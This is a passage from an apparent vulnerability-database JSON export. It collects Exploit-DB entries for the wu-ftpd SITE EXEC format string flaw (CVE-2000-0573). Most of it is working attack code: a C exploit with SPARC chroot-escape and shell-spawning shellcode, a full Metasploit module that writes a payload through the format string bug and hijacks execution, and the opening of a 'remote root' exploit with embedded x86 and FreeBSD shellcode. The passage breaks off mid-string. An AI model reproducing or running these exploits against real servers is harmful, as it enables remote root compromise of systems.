site_padding depends on the '/bin/ftp-exec/' \r\n** config stuff.\r\n**\r\n** (./wu -p 2 -d 0xff4 ; cat ) | nc localhost 21\r\n**\r\n*/\r\n/* Stolener Foundation */\r\n\r\n\r\n#include <unistd.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n\r\n#ifdef __linux\r\n#include <getopt.h>\r\n#endif\r\n\r\nvoid *build_format_string(int where,\r\n\t\t\t int what,\r\n\t\t\t int gout,\r\n\t\t\t int eat,\r\n\t\t\t int pad)\r\n{\r\n int expected_len;\r\n int what1, where1;\r\n int what2, where2;\r\n char w1[512];\r\n char w2[512];\r\n\r\n int i;\r\n char *buf, *p;\r\n\r\n /* generate two %hn len : */\r\n\r\n what1 = (what >> 16) & 0xffff;\r\n what2 = what & 0xffff; \r\n\r\n fprintf(stderr, \"what1: %0x\\n\", what1);\r\n fprintf(stderr, \"what2: %0x\\n\", what2);\r\n\r\n if ( what1 > what2 ) {\r\n where1 = where + 2;\r\n where2 = where;\r\n what1 -= what2;\r\n } else {\r\n where1 = where;\r\n where2 = where + 2;\r\n what2 -= what1;\r\n }\r\n\r\n fprintf(stderr, \"removing %d.\\n\", pad + 2 * sizeof(where) + gout + \r\n\t (eat - 1) * 12);\r\n\r\n if (where1 < where2) {\r\n what1 -= pad + 2 * sizeof(where) + (eat - 1) * 12 + gout;\r\n } else {\r\n what2 -= pad + 2 * sizeof(where) + (eat - 1) * 12 + gout;\r\n }\r\n\r\n fprintf(stderr, \"%08x: writing first %s\\n\", what,\r\n\t (where1 > where2) ? 
\"what2\" : \"what1\");\r\n fprintf(stderr, \"what1 is %08x, what2 is %08x\\n\",\r\n\t what1, what2);\r\n\r\n sprintf(w1, \"%%0%dx%%hn\", what1);\r\n sprintf(w2, \"%%0%dx%%hn\", what2);\r\n\r\n fprintf(stderr, \"1: %s\\n2: %s\\n\", w1, w2);\r\n\r\n /* calculate expected len : */\r\n\r\n expected_len = pad + 12 + (eat - 1) * 8\r\n\t + strlen(w1) + strlen(w2) + 1;\r\n\r\n fprintf(stderr, \"len is %d\\n\", expected_len);\r\n\r\n buf = (char *) malloc(expected_len);\r\n\r\n if ( buf == NULL) \r\n return buf;\r\n\r\n p = buf;\r\n\r\n /* pad */\r\n for (i = 0; i < pad; i++) {\r\n *p++ = '.';\r\n }\r\n\r\n /* retaddr, part 1 - first %hn*/\r\n *p++ = (where1 >> 24) & 0xff;\r\n *p++ = (where1 >> 16) & 0xff;\r\n *p++ = (where1 >> 8) & 0xff;\r\n *p++ = (where1) & 0xff;\r\n\r\n *p++ = 0x0f;\r\n *p++ = 0x0e;\r\n *p++ = 0x0e;\r\n *p++ = 0x0f; /* so that the first %0(much)x eats something\r\n\r\n /* retaddr, part 2 - second %hn */\r\n *p++ = ((where2) >> 24) & 0xff;\r\n *p++ = ((where2) >> 16) & 0xff;\r\n *p++ = ((where2) >> 8) & 0xff;\r\n *p++ = (where2) & 0xff;\r\n\r\n /* eaters.. 
*/\r\n for (i = 0; i < (eat - 1); i++) {\r\n strcpy(p, \"%000012x\");\r\n p += 8;\r\n }\r\n\r\n /* what1, what2 */\r\n if (what1 > what2) {\r\n strcpy(p, w1);\r\n strcpy(p + strlen(w1), w2);\r\n } else {\r\n strcpy(p, w2);\r\n strcpy(p + strlen(w2), w1);\r\n }\r\n\r\n\r\n return buf;\r\n}\r\n\r\nvoid *ftp_escape(void *buf)\r\n{\r\n void *boh;\r\n char *p = buf;\r\n char *r;\r\n\r\n boh = malloc(4096);\r\n r = boh;\r\n\r\n while (*p) {\r\n *r++ = *p;\r\n if ((*p) == '\\xff')\r\n *r++ = *p;\r\n p++;\r\n }\r\n *r = '\\0';\r\n return boh;\r\n}\r\n\r\nvoid usage(char *me)\r\n{\r\n fprintf(stderr, \"Usage : %s \\n\"\r\n\t \" [-w where (hexa) ] /* ret position */\\n\"\r\n\t\t \" 0 [-o offset ] /* or just offset, or both */\\n\"\r\n\t \"1010 [-d distance (hex)] /* distance to pass */\\n\"\r\n\t\t \" 2 [-s site_pad ] /* padding to site_exec */\\n\"\r\n\t\t \" 3 [-p pass_pad ] /* padding to eggshell */\\n\"\r\n\t\t \" 4 [-g gout ] /* output size (200-) */\\n\"\r\n\t\t \" 15 [-e eat ] /* pointers to eat */\\n\\n\\n\",\r\n\t\t me);\r\n exit(0);\r\n}\r\n\r\nmain(int argc, char **argv)\r\n{\r\n char c;\r\n int where, offset, distance, gout, site_pad, pass_pad, eat;\r\n char *buf;\r\n char break_sparc[] =\r\n\t\"\\x90\\x1b\\xc0\\x0f\" // xor %o7, %o7, %o0\r\n\t\"\\x82\\x10\\x20\\x17\" // mov 23, %g1\r\n\t\"\\x91\\xd0\\x20\\x08\" // ta 8 ! setuid(0)\r\n\t\"\\xae\\x10\\x20\\x2e\" // mov 0x2e, %l7\r\n\t\"\\xaf\\x2d\\xe0\\x18\" // sll %l7, 24, %l7\r\n\t\"\\xee\\x23\\xbf\\xd0\" // st %l7, [ %sp - 48 ]\r\n\t\"\\x90\\x23\\xa0\\x30\" // sub %sp, 48, %o0\r\n\t\"\\x82\\x10\\x20\\x05\" // mov 5, %g1\r\n\t\"\\x92\\x1b\\xc0\\x0f\" // xor %o7, %o7, %o1\r\n\t\"\\x91\\xd0\\x20\\x08\" // ta 8 ! 
fd = open(\".\", 0);\r\n\t\"\\xa6\\x82\\x20\\x01\" // addcc %o0, 1, %l3 !\r\n\t\"\\xae\\x10\\x20\\x6b\" // mov 0x6b, %l7\r\n\t\"\\xaf\\x2d\\xe0\\x18\" // sll %l7, 24, %l7\r\n\t\"\\xee\\x23\\xbf\\xd0\" // st %l7, [ %sp - 48 ]\r\n\t\"\\x90\\x23\\xa0\\x30\" // sub %sp, 48, %o0\r\n\t\"\\x92\\x10\\x21\\xff\" // mov 0x1ff, %o1\r\n\t\"\\x82\\x10\\x20\\x50\" // mov 0x50, %g1\r\n\t\"\\x91\\xd0\\x20\\x08\" // ta 8 ! mkdir(\"k\", 0755)\r\n\t\"\\x90\\x23\\xa0\\x30\" // sub %sp, 48, %o0\r\n\t\"\\x82\\x10\\x20\\x3d\" // mov 0x3d, %g1\r\n\t\"\\x91\\xd0\\x20\\x08\" // ta 8 ! chroot(\"k\")\r\n\t\"\\x90\\x24\\xe0\\x01\" // sub %l3, 1, %o0\r\n\t\"\\x82\\x10\\x20\\x78\" // mov 0x78, %g1\r\n\t\"\\x91\\xd0\\x20\\x08\" // ta 8 ! fchdir(fd)\r\n\t\"\\x2f\\x0b\\x8b\\x8b\" // sethi %hi(0x2e2e2c00), %l7\r\n\t\"\\xae\\x15\\xe3\\x2e\" // or %l7, 0x32e, %l7\r\n\t\"\\xee\\x23\\xbf\\xd0\" // st %l7, [ %sp - 48 ] ! ../.\r\n\t\"\\x2f\\x0b\\xcb\\x8b\" // sethi %hi(0x2f2e2c00), %l7\r\n\t\"\\xae\\x15\\xe2\\x2f\" // or %l7, 0x22f, %l7 \r\n\t\"\\xee\\x23\\xbf\\xd4\" // st %l7, [ %sp - 44 ] ! /../\r\n\t\"\\xee\\x23\\xbf\\xd8\" // st %l7, [ %sp - 40 ]\r\n\t\"\\xee\\x23\\xbf\\xdc\" // st %l7, [ %sp - 36 ]\r\n\t\"\\xee\\x23\\xbf\\xe0\" // st %l7, [ %sp - 32 ]\r\n\t\"\\xee\\x23\\xbf\\xe4\" // st %l7, [ %sp - 28 ]\r\n\t\"\\xee\\x23\\xbf\\xe8\" // st %l7, [ %sp - 24 ]\r\n\t\"\\xee\\x23\\xbf\\xec\" // st %l7, [ %sp - 20 ] ! .././..//..//../(ad lib)\r\n\t\"\\xc0\\x23\\xbf\\xf0\" // clr [ %sp - 16 ]\r\n\t\"\\x82\\x10\\x20\\x0c\" // mov 0xc, %g1\r\n\t\"\\x90\\x23\\xa0\\x30\" // sub %sp, 48, %o0\r\n\t\"\\x91\\xd0\\x20\\x08\" // ta 8 ! chdir(\".././../...\")\r\n\t\"\\xae\\x10\\x20\\x2e\" // mov 0x2e, %l7\r\n\t\"\\xaf\\x2d\\xe0\\x18\" // sll %l7, 24, %l7\r\n\t\"\\xee\\x23\\xbf\\xd0\" // st %l7, [ %sp - 48 ] ! stupido. 
anyway.\r\n\t\"\\x90\\x23\\xa0\\x30\" // sub %sp, 48, %o0\r\n\t\"\\x82\\x10\\x20\\x3d\" // mov 0x3d, %g1\r\n\t\"\\x91\\xd0\\x20\\x08\" // ta 8\r\n\t\"\\x2d\\x0b\\xd8\\x9a\" // sethi %hi(0x2f62696e), %l6 ! no more mine.\r\n\t\"\\xac\\x15\\xa1\\x6e\" // or %l6, %lo(0x2f62696e), %l6\r\n\t\"\\x2f\\x0b\\xdc\\xda\" // sethi %hi(0x2f736800), %l7\r\n\t\"\\x90\\x0b\\x80\\x0e\" // and %sp, %sp, %o0\r\n\t\"\\x92\\x03\\xa0\\x08\" // add %sp, 8, %o1\r\n\t\"\\x94\\x1b\\xc0\\x0f\" // xor %o7, %o7, %o2\r\n\t\"\\x9c\\x03\\xa0\\x10\" // add %sp, 16, %sp\r\n\t\"\\xec\\x3b\\xbf\\xf0\" // std %l6, [%sp-16]\r\n\t\"\\xd0\\x23\\xbf\\xf8\" // st %o0, [%sp-8]\r\n\t\"\\xc0\\x23\\xbf\\xfc\" // st %g0, [%sp-4]\r\n\t\"\\x82\\x10\\x20\\x3b\" // mov 59, %g1\r\n\t\"\\x91\\xd0\\x20\\x08\" // ta 8\r\n\t\"\\x91\\xd0\\x20\\x08\"; // ta 8 \r\n\r\n\r\n\r\n offset = 0;\r\n where = 0xffbeeed4;\r\n distance = 0x1004;\r\n gout = 4;\r\n eat = 15;\r\n site_pad = 2;\r\n pass_pad = 3;\r\n\r\n while ( ( c = getopt(argc, argv, \"w:o:d:e:g:s:p:\") ) != EOF ) {\r\n switch(c) {\r\n\t case 'w':\r\n\t where = strtoul(optarg, NULL, 16);\r\n\t break;\r\n\t case 'o':\r\n\t offset = atoi(optarg);\r\n\t break;\r\n\t case 'd':\r\n\t distance = strtoul(optarg, NULL, 16);\r\n\t break;\r\n\t case 'e':\r\n\t eat = atoi(optarg);\r\n\t break;\r\n\t case 'g':\r\n\t gout = atoi(optarg);\r\n\t break;\r\n\t case 's':\r\n\t site_pad = atoi(optarg) % 4;\r\n\t break;\r\n\t case 'p':\r\n\t pass_pad = atoi(optarg) % 4;\r\n\t break;\r\n\t default:\r\n\t usage(argv[0]);\r\n }\r\n }\r\n\r\n where += offset;\r\n\r\n fprintf(stderr, \"ret [%x]:%x\\n\"\r\n\t \t \"ppad %d\\n\"\r\n\t\t \"spad %d\\n\"\r\n\t\t \"gout %d\\n\"\r\n\t\t \"eat %d\\n\",\r\n\t\t where, where + distance,\r\n\t\t pass_pad, site_pad, gout, eat);\r\n\r\n printf(\"user ftp\\n\");\r\n\r\n buf = ftp_escape(break_sparc);\r\n printf(\"pass %.*s%s\\n\", pass_pad, \"xxxx\", buf);\r\n \r\n buf = build_format_string(where, where + distance - 8, gout, eat, site_pad);\r\n buf = 
ftp_escape(buf);\r\n\r\n printf (\"site exec %s\\n\", buf);\r\n}\r\n\n\n// milw0rm.com [2001-01-03]\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/239/"}, {"lastseen": "2016-02-01T23:34:36", "description": "wu-ftpd SITE EXEC/INDEX Format String Vulnerability. CVE-2000-0573. Remote exploit for linux platform", "published": "2010-11-30T00:00:00", "type": "exploitdb", "title": "wu-ftpd - SITE EXEC/INDEX Format String Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2000-0573"], "modified": "2010-11-30T00:00:00", "id": "EDB-ID:16311", "href": "https://www.exploit-db.com/exploits/16311/", "sourceData": "##\r\n# $Id: wuftpd_site_exec_format.rb 11166 2010-11-30 00:16:53Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Ftp\r\n\tinclude Msf::Exploit::FormatString\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'wu-ftpd SITE EXEC/INDEX Format String Vulnerability',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a format string vulnerability in versions of the\r\n\t\t\t\tWashington University FTP server older than 2.6.1. 
By executing\r\n\t\t\t\tspecially crafted SITE EXEC or SITE INDEX commands containing format\r\n\t\t\t\tspecifiers, an attacker can corrupt memory and execute arbitrary code.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'jduck' ],\r\n\t\t\t'Version' => '$Revision: 11166 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2000-0573'],\r\n\t\t\t\t\t['OSVDB', '11805'],\r\n\t\t\t\t\t['BID', '1387']\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t\t'PrependChrootBreak' => true\r\n\t\t\t\t},\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t# format string max length\r\n\t\t\t\t\t'Space' => 256,\r\n\t\t\t\t\t# NOTE: \\xff's need to be doubled (per ftp/telnet stuff)\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x09\\x0a\\x0d\\x20\\x25\\x2f\",\r\n\t\t\t\t\t'DisableNops'\t=> 'True',\r\n\t\t\t\t\t'StackAdjustment' \t=> -1500\r\n\t\t\t\t},\r\n\t\t\t'Platform' => [ 'linux' ],\r\n\t\t\t'Targets' =>\r\n\t\t\t[\r\n\t\t\t\t#\r\n\t\t\t\t# Automatic targeting via fingerprinting\r\n\t\t\t\t#\r\n\t\t\t\t[ 'Automatic Targeting', { 'auto' => true } ],\r\n\r\n\t\t\t\t#\r\n\t\t\t\t# specific targets\r\n\t\t\t\t#\r\n\t\t\t\t[\t'Slackware 2.1 (Version wu-2.4(1) Sun Jul 31 21:15:56 CDT 1994)',\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\t'UseDPA' \t=> false,\r\n\t\t\t\t\t\t'PadBytes'\t=> 3,\r\n\t\t\t\t\t\t'NumPops' \t=> 8,\r\n\t\t\t\t\t\t'AddrPops' => 100,\r\n\t\t\t\t\t\t'Offset' => -2088, \t\t\t# offset to stack return\r\n\t\t\t\t\t\t'Writable' \t=> 0xbfffde26, \t# stack, avoid badchars\r\n\t\t\t\t\t\t'FlowHook'\t=> -1, # auto now... 
0xbffff1e4\t\t# stack return addr\r\n\t\t\t\t\t}\r\n\t\t\t\t],\r\n\t\t\t\t# these aren't exploitable (using built-in, stripped down vsprintf, no %n)\r\n\t\t\t\t#[\t'RedHat 5.2 (Version wu-2.4.2-academ[BETA-18](1) Mon Aug 3 19:17:20 EDT 1998)',\r\n\t\t\t\t#[\t'RedHat 6.0 (Version wu-2.4.2-VR17(1) Mon Apr 19 09:21:53 EDT 1999)',\r\n\t\t\t\t#[\t'RedHat 6.1 (Version wu-2.5.0(1) Tue Sep 21 16:48:12 EDT 1999)',\r\n\t\t\t\t[\t'RedHat 6.2 (Version wu-2.6.0(1) Mon Feb 28 10:30:36 EST 2000)',\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\t'UseDPA' \t=> true,\r\n\t\t\t\t\t\t'PadBytes'\t=> 2,\r\n\t\t\t\t\t\t'NumPops' \t=> 276,\r\n\t\t\t\t\t\t'AddrPops' => 2,\r\n\t\t\t\t\t\t'Offset' => -17664, \t\t\t# offset to stack return\r\n\t\t\t\t\t\t'Writable' \t=> 0x806e726,\t\t# bss\r\n\t\t\t\t\t\t#'Writable' \t=> 0xbfff0126,\t\t# stack, avoid badchars\r\n\t\t\t\t\t\t'FlowHook'\t=> -1, # auto now... 0xbfffb028\t\t# stack return addr\r\n\t\t\t\t\t\t#'FlowHook' => 0x806e1e0\t\t# GOT of sprintf\r\n\t\t\t\t\t}\r\n\t\t\t\t],\r\n\r\n\t\t\t\t#\r\n\t\t\t\t# this one will detect the parameters automagicly\r\n\t\t\t\t#\r\n\t\t\t\t[\t'Debug',\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\t'UseDPA' \t=> false,\r\n\t\t\t\t\t\t'PadBytes'\t=> 0,\r\n\t\t\t\t\t\t'NumPops' \t=> 0,\r\n\t\t\t\t\t\t'AddrPops' => -1,\r\n\t\t\t\t\t\t'Offset' => -1,\r\n\t\t\t\t\t\t'Writable' \t=> 0x41414242, \t#\r\n\t\t\t\t\t\t'FlowHook'\t=> 0x43434545\t\t#\r\n\t\t\t\t\t}\r\n\t\t\t\t],\r\n\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Jun 22 2000'))\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(21),\r\n\t\t\t], self.class )\r\n\tend\r\n\r\n\r\n\tdef check\r\n\t\t# NOTE: We don't care if the login failed here...\r\n\t\tret = connect_login\r\n\r\n\t\t# We just want the banner to check against our targets..\r\n\t\tprint_status(\"FTP Banner: #{banner.strip}\")\r\n\t\tstatus = Exploit::CheckCode::Safe\r\n\t\tif banner =~ /Version wu-2\\.(4|5)/\r\n\t\t\tstatus = Exploit::CheckCode::Appears\r\n\t\telsif banner =~ /Version 
wu-2\\.6\\.0/\r\n\t\t\tstatus = Exploit::CheckCode::Appears\r\n\t\tend\r\n\r\n\t\t# If we've made it this far, we care if login succeeded.\r\n\t\tif (ret)\r\n\t\t\t# NOTE: vulnerable and exploitable might not mean the same thing here :)\r\n\t\t\tif not fmtstr_detect_vulnerable\r\n\t\t\t\tstatus = Exploit::CheckCode::Safe\r\n\t\t\tend\r\n\t\t\tif not fmtstr_detect_exploitable\r\n\t\t\t\tstatus = Exploit::CheckCode::Safe\r\n\t\t\tend\r\n\t\tend\r\n\r\n\t\tdisconnect\r\n\t\treturn status\r\n\tend\r\n\r\n\r\n\tdef exploit\r\n\r\n\t\tif (not connect_login)\r\n\t\t\traise RuntimeError, 'Unable to authenticate'\r\n\t\tend\r\n\r\n\t\t# Use a copy of the target\r\n\t\tmytarget = target\r\n\r\n\t\tif (target['auto'])\r\n\t\t\tmytarget = nil\r\n\r\n\t\t\tprint_status(\"Automatically detecting the target...\")\r\n\t\t\tif (banner and (m = banner.match(/\\(Version wu-(.*)\\) ready/))) then\r\n\t\t\t\tprint_status(\"FTP Banner: #{banner.strip}\")\r\n\t\t\t\tversion = m[1]\r\n\t\t\telse\r\n\t\t\t\traise RuntimeError, \"No matching target\"\r\n\t\t\tend\r\n\r\n\t\t\tregexp = Regexp.escape(version)\r\n\t\t\tself.targets.each do |t|\r\n\t\t\t\tif (t.name =~ /#{regexp}/) then\r\n\t\t\t\t\tmytarget = t\r\n\t\t\t\t\tbreak\r\n\t\t\t\tend\r\n\t\t\tend\r\n\r\n\t\t\tif (not mytarget)\r\n\t\t\t\traise RuntimeError, \"No matching target\"\r\n\t\t\tend\r\n\r\n\t\t\tprint_status(\"Selected Target: #{mytarget.name}\")\r\n\t\telse\r\n\t\t\tprint_status(\"Trying target #{mytarget.name}...\")\r\n\t\t\tif banner\r\n\t\t\t\tprint_status(\"FTP Banner: #{banner.strip}\")\r\n\t\t\tend\r\n\t\tend\r\n\r\n\t\t# proceed with chosen target...\r\n\r\n\t\t# detect stuff!\r\n\t\tif mytarget.name == \"Debug\"\r\n\t\t\t#fmtstr_set_caps(true, true)\r\n\t\t\t# dump the stack, so we can detect stuff magically\r\n\t\t\tprint_status(\"Dumping the stack...\")\r\n\t\t\tstack = Array.new\r\n\t\t\textra = \"aaaabbbb\"\r\n\t\t\t1000.times do |x|\r\n\t\t\t\tdw = fmtstr_stack_read(x+1, extra)\r\n\t\t\t\tbreak if not 
dw\r\n\t\t\t\tstack << dw\r\n\t\t\tend\r\n\r\n\t\t\tstack_data = stack.pack('V*')\r\n\t\t\tprint_status(\"Obtained #{stack.length*4} bytes of stack data:\\n\" + Rex::Text.to_hex_dump(stack_data))\r\n\r\n\t\t\t# detect the number of pad bytes\r\n\t\t\tidx = stack_data.index(\"aaaabbbb\")\r\n\t\t\tif not idx\r\n\t\t\t\traise RuntimeError, \"Whoa, didn't find the static bytes on the stack!\"\r\n\t\t\tend\r\n\t\t\tnum_pad = 0\r\n\t\t\tnum_pad = 4 - (idx % 4) if (idx % 4) > 0\r\n\t\t\tmytarget.opts['PadBytes'] = num_pad\r\n\r\n\t\t\t# calculate the number of pops needed to hit our addr\r\n\t\t\tnum_pops = (idx + num_pad) / 4\r\n\t\t\tmytarget.opts['NumPops'] = num_pops\r\n\t\telse\r\n\t\t\tnum_pad = mytarget['PadBytes']\r\n\t\t\tnum_pops = mytarget['NumPops']\r\n\t\t\tsc_loc = mytarget['Writable']\r\n\t\t\tret = mytarget['FlowHook']\r\n\t\tend\r\n\r\n\t\tprint_status(\"Number of pad bytes: #{num_pad}\")\r\n\t\tprint_status(\"Number of pops: #{num_pops}\")\r\n\r\n\t\t# debugging -> don't try it!\r\n\t\treturn if mytarget.name == \"Debug\"\r\n\r\n\t\t#print_status(\"ATTACH!\")\r\n\t\t#select(nil,nil,nil,5)\r\n\r\n\t\tfmtstr_detect_caps\r\n\r\n\t\t# compute the stack return address using the fmt to leak memory\r\n\t\taddr_pops = mytarget['AddrPops']\r\n\t\toffset = mytarget['Offset']\r\n\t\tif addr_pops > 0\r\n\t\t\tstackaddr = fmtstr_stack_read(addr_pops)\r\n\t\t\tprint_status(\"Read %#x from offset %d\" % [stackaddr, addr_pops])\r\n\t\t\tret = stackaddr + offset\r\n\t\tend\r\n\r\n\t\tprint_status(\"Writing shellcode to: %#x\" % sc_loc)\r\n\t\tprint_status(\"Hijacking control via %#x\" % ret)\r\n\r\n\r\n\t\t# no extra bytes before the padding..\r\n\t\tnum_start = 0\r\n\r\n\t\t# write shellcode to 'writable'\r\n\t\tarr = fmtstr_gen_array_from_buf(sc_loc, payload.encoded, mytarget)\r\n\r\n\t\t# process it in groups of 24 (max ~400 bytes per command)\r\n\t\tsc_num = 1\r\n\t\twhile arr.length > 0\r\n\t\t\tprint_status(\"Sending part #{sc_num} of the 
payload...\")\r\n\t\t\tsc_num += 1\r\n\r\n\t\t\tnarr = arr.slice!(0..24)\r\n\r\n\t\t\tfmtbuf = fmtstr_gen_from_array(num_start, narr, mytarget)\r\n\t\t\t# a space allows the next part to start with a '/'\r\n\t\t\tfmtbuf[num_pad-1,1] = \" \"\r\n\t\t\tfmtbuf.gsub!(/\\xff/, \"\\xff\\xff\")\r\n\t\t\tif ((res = send_cmd(['SITE', 'EXEC', fmtbuf], true)))\r\n\t\t\t\tif res[0,4] == \"500 \"\r\n\t\t\t\t\traise RuntimeError, \"Crap! Something went wrong when uploading the payload...\"\r\n\t\t\t\tend\r\n\t\t\tend\r\n\t\tend\r\n\r\n\r\n\t\t# write 'writable' addr to flowhook (execute shellcode)\r\n\t\t# NOTE: the resulting two writes must be done at the same time\r\n\t\tprint_status(\"Attempting to write %#x to %#x..\" % [sc_loc, ret])\r\n\r\n\t\tfmtbuf = generate_fmt_two_shorts(num_start, ret, sc_loc, mytarget)\r\n\t\t# a space allows the next part to start with a '/'\r\n\t\tfmtbuf[num_pad-1,1] = \" \"\r\n\t\tfmtbuf.gsub!(/\\xff/, \"\\xff\\xff\")\r\n\t\t# don't wait for the response here :)\r\n\t\tres = send_cmd(['SITE', 'EXEC', fmtbuf], false)\r\n\r\n\t\tprint_status(\"Your payload should have executed now...\")\r\n\t\thandler\r\n\tend\r\n\r\n\r\n\t#\r\n\t# these two functions are used to read stack memory\r\n\t# (used by fmtstr_stack_read()\r\n\t#\r\n\tdef trigger_fmt(fmtstr)\r\n\t\treturn nil if fmtstr.length >= (512 - (4+1 + 4+1 + 2 + 2))\r\n\t\tsend_cmd(['SITE', 'EXEC', 'x', fmtstr], true)\r\n\tend\r\n\r\n\tdef extract_fmt_output(res)\r\n\t\tif (res =~ /^5.. /)\r\n\t\t\t#throw \"Crap! Something went wrong while dumping the stack...\"\r\n\t\t\treturn nil\r\n\t\tend\r\n\t\tret = res.strip.split(/\\r?\\n/)[0]\r\n\t\tret = ret[6,ret.length]\r\n\t\treturn ret\r\n\tend\r\n\r\n\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16311/"}, {"lastseen": "2016-01-31T11:55:18", "description": "wu-ftpd 2.6.0 Remote Root Exploit. CVE-2000-0573. 
Remote exploits for multiple platform", "published": "2000-11-21T00:00:00", "type": "exploitdb", "title": "wu-ftpd 2.6.0 - Remote Root Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2000-0573"], "modified": "2000-11-21T00:00:00", "id": "EDB-ID:201", "href": "https://www.exploit-db.com/exploits/201/", "sourceData": "/*\r\n * (c) 2000 venglin / b0f\r\n * http://b0f.freebsd.lublin.pl\r\n *\r\n * WUFTPD 2.6.0 REMOTE ROOT EXPLOIT (22/06/2000, updated: 05/08/2000)\r\n *\r\n * Idea and preliminary version of exploit by tf8\r\n *\r\n * Greetz: Lam3rZ, TESO, ADM, lcamtuf, karpio.\r\n * Dedicated to ksm.\r\n *\r\n * **PRIVATE**DO*NOT*DISTRIBUTE**\r\n */\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <stdarg.h>\r\n#include <string.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n#include <netdb.h>\r\n#include <unistd.h>\r\n#include <arpa/inet.h>\r\n\r\n\r\n#define repln\tif (getreply(0) < 0) return -1\r\n#define replv\tif (getreply(1) < 0) return -1\r\n\r\n#ifdef DEBUG\r\n#define repl replv\r\n#else\r\n#define repl repln\r\n#endif\r\n\r\nchar usage[] = \"usage: bobek [-l login] [-o port] [-f retofs] [-s retlocofs]\\n\\t<-t type> <hostname>\";\r\nchar recvbuf[BUFSIZ], sendbuf[BUFSIZ];\r\nFILE *cin, *cout;\r\n\r\nchar linuxcode[]= /* Lam3rZ chroot() code 
*/\r\n\t\"\\x31\\xc0\\x31\\xdb\\x31\\xc9\\xb0\\x46\\xcd\\x80\\x31\\xc0\\x31\\xdb\"\r\n\t\"\\x43\\x89\\xd9\\x41\\xb0\\x3f\\xcd\\x80\\xeb\\x6b\\x5e\\x31\\xc0\\x31\"\r\n\t\"\\xc9\\x8d\\x5e\\x01\\x88\\x46\\x04\\x66\\xb9\\xff\\x01\\xb0\\x27\\xcd\"\r\n\t\"\\x80\\x31\\xc0\\x8d\\x5e\\x01\\xb0\\x3d\\xcd\\x80\\x31\\xc0\\x31\\xdb\"\r\n\t\"\\x8d\\x5e\\x08\\x89\\x43\\x02\\x31\\xc9\\xfe\\xc9\\x31\\xc0\\x8d\\x5e\"\r\n\t\"\\x08\\xb0\\x0c\\xcd\\x80\\xfe\\xc9\\x75\\xf3\\x31\\xc0\\x88\\x46\\x09\"\r\n\t\"\\x8d\\x5e\\x08\\xb0\\x3d\\xcd\\x80\\xfe\\x0e\\xb0\\x30\\xfe\\xc8\\x88\"\r\n\t\"\\x46\\x04\\x31\\xc0\\x88\\x46\\x07\\x89\\x76\\x08\\x89\\x46\\x0c\\x89\"\r\n\t\"\\xf3\\x8d\\x4e\\x08\\x8d\\x56\\x0c\\xb0\\x0b\\xcd\\x80\\x31\\xc0\\x31\"\r\n\t\"\\xdb\\xb0\\x01\\xcd\\x80\\xe8\\x90\\xff\\xff\\xff\\x30\\x62\\x69\\x6e\"\r\n\t\"\\x30\\x73\\x68\\x31\\x2e\\x2e\\x31\\x31\\x76\\x65\\x6e\\x67\\x6c\\x69\"\r\n\t\"\\x6e\\x40\\x6b\\x6f\\x63\\x68\\x61\\x6d\\x2e\\x6b\\x61\\x73\\x69\\x65\"\r\n\t\"\\x2e\\x63\\x6f\\x6d\";\r\n\r\nchar bsdcode[] = /* Lam3rZ chroot() code rewritten for FreeBSD by venglin 
*/\r\n\t\"\\x31\\xc0\\x50\\x50\\x50\\xb0\\x7e\\xcd\\x80\\x31\\xdb\\x31\\xc0\\x43\"\r\n\t\"\\x43\\x53\\x4b\\x53\\x53\\xb0\\x5a\\xcd\\x80\\xeb\\x77\\x5e\\x31\\xc0\"\r\n\t\"\\x8d\\x5e\\x01\\x88\\x46\\x04\\x66\\x68\\xff\\x01\\x53\\x53\\xb0\\x88\"\r\n\t\"\\xcd\\x80\\x31\\xc0\\x8d\\x5e\\x01\\x53\\x53\\xb0\\x3d\\xcd\\x80\\x31\"\r\n\t\"\\xc0\\x31\\xdb\\x8d\\x5e\\x08\\x89\\x43\\x02\\x31\\xc9\\xfe\\xc9\\x31\"\r\n\t\"\\xc0\\x8d\\x5e\\x08\\x53\\x53\\xb0\\x0c\\xcd\\x80\\xfe\\xc9\\x75\\xf1\"\r\n\t\"\\x31\\xc0\\x88\\x46\\x09\\x8d\\x5e\\x08\\x53\\x53\\xb0\\x3d\\xcd\\x80\"\r\n\t\"\\xfe\\x0e\\xb0\\x30\\xfe\\xc8\\x88\\x46\\x04\\x31\\xc0\\x88\\x46\\x07\"\r\n\t\"\\x89\\x76\\x08\\x89\\x46\\x0c\\x89\\xf3\\x8d\\x4e\\x08\